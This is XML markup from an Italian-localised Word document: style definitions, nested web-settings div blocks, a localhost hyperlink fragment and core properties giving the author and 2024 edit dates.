    <w:rsid w:val="00491A55"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00491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91A55"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00491A55"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007424E1"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00742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762868">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1621106580">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="113908964">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5802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9358">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1656227261">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="37823379">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16304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69377">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="681975645">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1277636088">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="20786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322">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1212497703">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2068530926">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="6513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19748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1219509225">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1221554116">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="818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1634">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1648708092">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="351613881">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="11813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http://localhost:8080/test"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A715-CEB7-4AE8-94E6-B2F8D34C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30</Pages>
  <Words>2478</Words>
  <Characters>14130</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ignano  Luana</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pulignano  Luana</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-10T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-20T16:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>